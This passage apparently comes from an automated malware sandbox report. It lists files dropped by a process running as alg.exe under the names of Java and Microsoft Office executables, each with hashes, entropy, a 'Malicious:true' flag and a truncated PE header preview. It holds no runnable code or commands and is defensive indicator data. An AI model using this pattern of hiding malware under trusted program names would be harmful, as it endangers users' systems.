                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:+SmviJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:B6/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:B828B278C2F53C35E5100809535E18DD
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:21343BE6A01CA4B7F884B3764689CDA708E3C316
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:82A41389986BC78184714C54406394C1EECD7ABEB6CCE18542133A72ECB0188E
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:9A9C1CE973FAF25D97AD4B6A04E0E9ECD8D53F327AE944C76F7DCBBB6F762F8F17FB5F3F84174EDFD51756118A57729678422090B3B66D58704B9F3C53505DA1
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................(......................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.535223075590209
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:d45riJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Gx/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:0F769F73433541C1994D331138731434
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:8A6F99F958E14F70DB0D9DC1136620B7D0AD3AF1
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:1B0163425179DF634B0CF8EAD92873BC685E6E3AD8BBC3CCB2EE00251818F2BE
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:656B8F5C4A06A83512A31B53FB4A8B5BDBA769DEE13B00BFBFC6460FCF52746EBAD54317412C3E6896C518BD13940A635DA478C4B3AD6DDFDB1C388E62C5681B
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.535256897902347
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:09/ziJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:oP/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:221074B089EB9F437154C7723EAE494D
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:3535251437F5451744F72C0163BE8952CF6207DA
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:BF11358C8B314184C538315FFF98E0A0448B9A828D224120AAC8D8851E2CEEB8
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:4767870CDE44796EAFE11A2409D66965068D27BD29AE6BBEE450F0459994CADA56BDF64120EC74DC16475569A025A95D023AD9A4270791590049C8E1824ED870
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.535160410641559
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:nBmjiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Be/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:A13E53B8C59315F9E105341D04437990
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:5B2DE0E9645240B3CF05D524A03C511554742444
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:9FE6DE4F8415087C645120F275E620E927A545FE7B79F49B2BA154150AC5389F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:360200F44B35299577E0F7931F738FEF791C5ED3AB8CD132BF73137BB1DE90891BC1684635C8AB6D463E67E4491DE9B4E0348FC222DE5E9C4C8761AB73375B53
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................kD.......................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.535216084306793
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:L2SLiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:KC/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:D46A1796801D1725D9C53972EC6D9A72
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:6FFE85823CDA9EBD37531E6DC583822CED701F38
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:FF22ACF4421ED1E9AF50BE7CAFBE23EB990A9220FEA2157D20D8BF64EB574B7D
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:00ACD6B30FA124275C436F62704E8A301A34641C8215C9C32E48B460FBAC2E8F77BAB58C2F7A59F175EAC9F6178E63EE3FFBECCEAF3A3197122C488B40370A76
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................e.......................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.53527471039737
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:wx/ziJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:YP/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:47BF5DAE969368832BDE0026B7FEF50D
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:D78E7C2563D4897052027080F8300D320F5C4926
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:26FC9E65330934CB8D583D629F3277D19FDAD6E7B7E3A82FDAE837AC402FBD4A
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:009C516213373912D4ED7BA4A076830AD0022A403FCE3C6BDD2CEC214AE1CD5BE596B4478287A8F1D64645846BF672825BEDA163731B9AA5DCBE255AAE26C932
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1358336
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.617658773715098
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:lDR/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:lFLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:1F9C04FCFB9E40087C744793B4A2596F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:86544E52F49DDC416669A8D5B8E11538EE843060
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:B5B999EDF8B56537A7B68656CB4EFAC10C09C331315EDDC3429B3EFE50C02CEF
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:4F41580AC78721429AEAE65CF0980DF7077ABD59AC01C570127A41183984A897CA7A82AC0CA5C66DE8B02C71321F080FCD0805CAC2B04A92CB6A2A4521FBE80A
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..*&).\^(.<&).\^-.3&).\^*.=&).*M-.?&).*M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................|...........u............@.................................{...........................................@....0..............................H...T...............................@...............P...P........................text...L{.......|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...`...@......................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1298432
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.534850539628578
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:fiQ/iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:60/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:E19CD923418E4E4FF8AEABECA7025DAF
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:EE2E0198A2AB55FECC6F3CFA13F524593B581304
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:DABB08F3AC6C021F38A87CDB6D4D44F28B604A048482471AD7728F0B77990BB3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:6F2A9DF19B4FAF09589AE1BCDD149978181D1144907BF740AF1862A0C10C97870549F542F17524D5B66F0B0EC6F5BA6BB210D3C0A749321DFFCEDBE35BEDD096
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@.................................K........................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...`...P.......0..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1454592
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.792957698853302
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:di7ln3roAN/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Ml3roANLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:44B40ECAA72F658670589CA7EF4E60AA
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:742907BB7089CADB5C58B80E6019FF8E19921D5C
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:B658339F44B10BA452AA9487D32A82DA3FC4A9F2D68E27D93C75FA1F302D8D55
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:9732410971801344501F289D4ADF529EC2AD698328401484E0F64BF761520E614D92E338528E0A3D60EBE8AB968C48F0128C547FE0357C6D42D75EEFFCA3255C
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................@!......t..................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...`..........................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1424896
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.81668577077679
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:uNfQP5/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:kE5LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:4B35EA24B2ED96C10DBFDF0A2B06F1EB
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:57A4DC942169DCA1377244A13ADB4E32A9D5B88A
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:909788A3E691844B861F78DCCA8D8B0A908BFC2A9851F2B3B16C2B6D85B2C3D5
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:492E3645A89520073A664A4BE70C6592903A50F9E2FDBAF35CAC8048247C2B8C886A7E4F014964EC8980074A6A22B9BE1D46ABBB2EAD7B340496F7A3827041AE
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................|.......|.......|.......|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@........................... .............................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...p...@......................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1443328
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.837561115183016
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:ELiN/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:xLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:F7BD03340069BF37A13797E5FB960393
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:857FA01B8795CFB9D9DFF63D9FE29D1C680D2E15
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:FD7E8059E720B997D36D30ADFFAA1041BC302F1EEA3155F161496447F8E658E9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:DE2673062889062BC32DFFEFA6188C2EE0915453C0164CE5EF5175DA5B51EF0FCB95B93C80A8662089979668C6F892E63D0B773E6366DAE7AB3158876DACC671
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@........................... .....j............ ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p.......F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1443328
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.83756336973137
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:6LiN/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:rLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:EA1F44592B9C1DF3DE25A2ECEE65C4C3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:FA2826B23ADDF1C3CF6E39E055D791E54F93C2E4
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:4F1F20A31730BDDACCD56C79C7CDA3110052D056DEC0F1D6791145E3F2826579
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:9D7BC70DE0BE8031FD4376E6B4C7DF171BF1002302B804305E5490215753012182F48B40245612D69B8EF709F5229AFFEF31739814345325787E8F4CF0B64CFB
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@........................... .................. ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p.......F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1499136
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.7918298238605574
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:cf9/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:cf9LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:5DFAEAA75D382A99D6802DB146242B87
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:69BE9A3C0476CB7A960FDDC14455C9AB0EDE854E
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:A44C211238FFB8CF0DAE9E6D92A5F5B58D6917C95AC5FDA246314CD1C8465834
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:9CF0DC6119CE0A389AC866D1BBD57C1C2265A2A66B89EE2301505DF7E212240182FD4302AA4AE8818A42CF687A068986D6339988073244745E682B2FC4A1F867
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@..............................!.....h..... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc.......0....... ..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1651712
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.157785010715094
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:UbUO42q/Eo/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:UxoLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:E59B46EBCFD691C7FC6C6B9900420863
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:3D1833AFD48F13075198D7C7B0A04F2D1873E20A
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:7B7AE5EB5ABCD11A19616D61404DE07E4107F821E15B2F4D730BC99AA7BFCD84
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:A2EB159DCF1593AC813B2A77AE3FABBC4DB8F8C854B4494EDA5D98F28D1B83EC9B0B23AF5A9AED487986989EB349755A0916F5564A074CCFDA5BFC22B89A07E9
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...|...............@....@..........................0$......F........... ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...............d..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):52712960
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.961787872433641
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:1572864:hLjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:hicZmsR3Lo/cnLe
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:4F4E21649A9E1341C080E42D3261EBA5
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:4EE7C7BFEEC266AE9B7C707D3D9497DDDE45815B
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:6725C702C1870B582F1493BA23074C1EEB08897021DEE89B5ED25A2BA9356B8E
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:4CA269D479AB4FB7E1D9BF1E80A0D5803A747BA612A42B37277B4409A7282656BA8838B77501E8FEB805CDFD7A2615C755064526187DB8695139C1D9A91C4140
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
